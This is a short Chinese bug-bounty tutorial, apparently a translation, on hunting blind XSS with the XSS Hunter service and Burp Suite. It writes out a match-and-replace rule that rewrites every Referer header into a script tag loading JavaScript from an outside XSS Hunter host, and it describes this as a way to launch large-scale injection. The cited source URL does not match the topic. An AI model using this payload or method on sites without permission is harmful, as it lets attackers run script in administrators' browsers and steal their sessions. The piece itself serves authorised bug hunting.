找到盲XSS漏洞的简单方法
这篇文章中我将分享一个我在某网站上发现的盲XSS。同时,我会向大家推荐一种新的盲XSS的工具。
盲XSS是跨站脚本的一种(XSS),攻击者“盲目地”在网页中输入一系列XSS的payload,希望能保存到数据库或文件中,攻击后端管理者。
目前,我使用XSS hunter(网页版)来寻找找出盲XSS。
XSShunter:
XSS Hunter是最近才推出的平台,提供大量的payload,同时可以监控和管理XSS的反馈。通过它,你可以发动各种XSS攻击,配合burpsuite能进行大规模盲XSS攻击。
攻击步骤
第1步:要在burpsuite创建新规则,因为没有任何预定义的规则,单击“添加”,就可以看到一个新规则对话框。单击“类型”的下拉列表,选择“Request header”。
然后,添加^Referer.*$
作为“匹配”条件。这里使用了正则表达式,作用是匹配任何以Referer开头的字符串。在HTTP请求中,一般存在一个Referer请求头。
接下来,将“替换”文本设置为Referer: “><sc ript src=https://newone.xss.ht></sc ript>
。然后,选中“正则表达式匹配”复选框,最后单击“确定”。
第2步:通过burpsuite拦截,你可以在“原始”请求中看到,Referer: “><sc ript src=https://newone.xss.ht></sc ript>
已被替换上去!
第3步:几个小时后,当我再次登录XXS SHunter时,我已经获得了一个盲XSS。
本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场
来源:https://www.vulnano.com/2019/03/facebook-messenger-server-random-memory.html
最新评论